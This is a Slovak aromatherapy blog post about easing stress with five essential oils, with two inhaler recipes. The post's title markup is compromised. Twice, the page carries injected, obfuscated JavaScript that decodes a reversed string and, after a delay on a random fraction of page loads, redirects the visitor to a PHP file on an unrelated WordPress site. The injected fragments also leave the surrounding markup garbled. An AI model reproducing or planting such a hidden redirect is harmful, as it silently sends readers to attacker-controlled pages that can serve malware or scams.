<“h1″ class="w-post-elm post_title us_custom_f5286e8b entry-title" itemprop="headline">Ako využiť esenciálne oleje na uvoľnenie stresu) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom%22%3A%220.5rem%22%2C%22font-family%22%3A%22h1%22%7D%7D“]
Nekomentované
[us_separator size=“small“]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom%22%3A%221.5rem%22%7D%7D“]

Stres a pocit vyčerpania nás sprevádza v každodennom živote. A hoci je stres v niektorých situáciách pre nás pozitívny…dlhodobé prežívanie stresu má obrovský negatívny vplyv na celkový organizmus. A preto je dôležité pravidelne uvoľňovať stres, a na to môžme využiť silu esenciálnych olejov.

Ako aromaterapeutka a koučka sa venujem v mnohých prípadoch práve uvoľňovaniu stresu a vyčerpania. V súčasnej neistej dobe je množstvo z nás vystavených tlaku nepoznaného, frustrácie, a množstva úloh, ktoré musíme zvládať a zabezpečiť aj počas fungovania „homeofficu“. V stave neustáleho stresu a vypätia sa už nedokážeme sústrediť, správne rozhodovať a vlastne ani nevieme kde začať.  Sme vystavení množstvu informácií, ktoré na nás vplývajú. To všetko a rýchle fungovanie bez skutočného času na seba sa stupňuje a prináša len ďalšie napätie, ktoré cítime v našom tele a aj mysli. Tá sa nedokáže zastaviť v cykle negatívnych myšlienok a kritiky čo má byť inak, lepšie, rýchlejšie…

Ponúkam vám niekoľko obľúbených esenciálnych olejov, ktoré sú značne preskúmané. A ukázalo sa,  že majú komponenty, ktoré skutočne môžu pomôcť upokojiť nervový systém a pomôcť nám cítiť sa uvoľnene.

Tu je 5 mojich obľúbených esenciálnych olejov, ktoré sa dajú použiť na uvoľnenie stresu!

Kadidlo (Boswellia carterii)
Cédrové drevo (Juniperus virginiana)
Červená mandarinka (Citrus reticulata)
Bergamot (Citrus bergamia)
Ylang Ylang (Cananga odorata)

 

Tieto esenciálne oleje pôsobia na zmiernenie stresu, pretože nám pomáhajú cítiť sa pri zemi (viac prepojení s našim fyzickým prostredím a sami so sebou), mentálne v harménii a emočne pokojní.

Pomáhajú tiež upokojiť nadmerné premýšľanie – zmierňujú pocit, že sa toho deje príliš veľa alebo niečo príliš veľké, čo by sa nedalo zvládnuť. Pomáhajú nájsť tak kľud a vidieť jasnejšie, aké môžte zvoliť kroky, aktivity, alebo rozhodnutia smerom vpred.

Pomáhajú nám vidieť perspektívu, pokoj a energiu na to, aby sme boli produktívni bez pocitu preťaženia.

Ďalším spôsobom, ako pomáhajú, je jednoduché povzbudenie, aby sme dýchali hlbšie, vedome. (Mindful/všímavé dýchanie je kľúčové „cvičenie“, ktoré vám pomôže aj v akútnych stavoch zastaviť sa a doslova dať telu signál na relaxáciu).

Predstavte si na chvíľu so mnou jednu zo svojich obľúbených vôní. Môže to byť čerstvo pokosená tráva, čerstvo upečený chlieb alebo vôňa sviežej ružovej záhrady v plnom kvete.

Niektorí z vás možno práve teraz dýchajú hlbšie, už len pri predstave arómy …

A keď sa v reálnom živote stretneme s krásnymi vôňami, máme tendenciu dýchať ešte hlbšie a plnšie – a na chvíľu spomaliť, kým si tú vôňu vychutnávame. To nám môže pomôcť cítiť sa prirodzene pokojnejšie a povzbudzuje aj naše svaly k uvoľňovaniu napätia.

Pridanie terapeutických esenciálnych olejov do každého dychu môže túto úľavu posunúť do nových rozmerov!

Poďme si ukázať 2 recepty s našimi 5 úžasnými éterickými olejmi, ktoré môžete použiť na stres!

to recepty na aromaterapeutické inhalátory, ktoré sú užasné v tom, že ich môžte nosiť všade so sebou, lebo sa pokojne zmestia do kabelky! Samozrejme viete zmesi využiť aj do difúzera a prevoňať tak celú miestnosť.

Recept na zmiernenie stresu č. 1:
Kvetinový inhalátor Ease

7 kvapiek bergamotového éterického oleja (Citrus bergamia)
5 kvapiek éterického oleja Červená mandarinka (Citrus reticulata)
3 kvapky éterického oleja Ylang Ylang (Cananga odorata)

Ak máte radi kvetinové arómy, budete tento recept zbožňovať!

Jedným z dôvodov, prečo sa kvetinové éterické oleje nazývajú „srdcové“, je ten, že pomáhajú tak dobre sústrediť naše emócie. Sú to perfektné éterické oleje, ktoré sa dajú použiť pri strese!

Ylang Ylang má obzvlášť silnú arómu. Aj samotné otvorenie fľaštičky môže naplniť miestnosť vôňou. V tejto zmesi používam iba 3 kvapky, takže neprekoná ostatné arómy. V skutočnosti môže byť použitie príliš veľa ďalších kvapiek ohromujúce a spôsobiť bolesť hlavy. Na tento recept stačia 3 kvapky!

Pridanie Bergamotu a Mandarinky prináša kvetinám jasný a radostný nádych citrusov.

Čo však v prípade, že nepreferujete kvetinové arómy?

Mám pre vás hlbší, zemitejší a uzemňujúci recept na inhalátor. . .

Recept na zmiernenie stresu č. 2:
Prekonám tento stres!

7 kvapiek éterického oleja z kadidla (Boswellia carterii)
5 kvapiek éterického oleja z cédrového dreva (Juniperus virginiana)
3 kvapky éterického oleja Bergamot (Citrus bergamia)

Kadidlo sa destiluje zo stromovej živice a cédrové drevo sa destiluje z dreva.

Tieto oleje nám poskytujú pocit harmónie, ticha, pokoja, duševnej pohody a pocitu bezpečia. Preto sú také skvelé na použitie pri strese.

Každý z týchto aromaterapeutických inhalátorov môžete mať pri sebe a používať ich po celý deň.

Môžete ich použiť v práci (aj tej domácej) a nikto iný nebude cítiť oleje iba vy. Môžete ich použiť, keď stojíte v rade na pošte. Môžete ich použiť pri upratovaní domu a chcete si chvíľu oddýchnuť a uvoľniť stres a napätie. Jednoducho kedykoľvek sa vám páči!

Užite si pokojný a vyrovnaný deň! Užite si Aroma deň!

Objavte ďalšie tipy ako ostať pokojný a v rovnováhe

Menu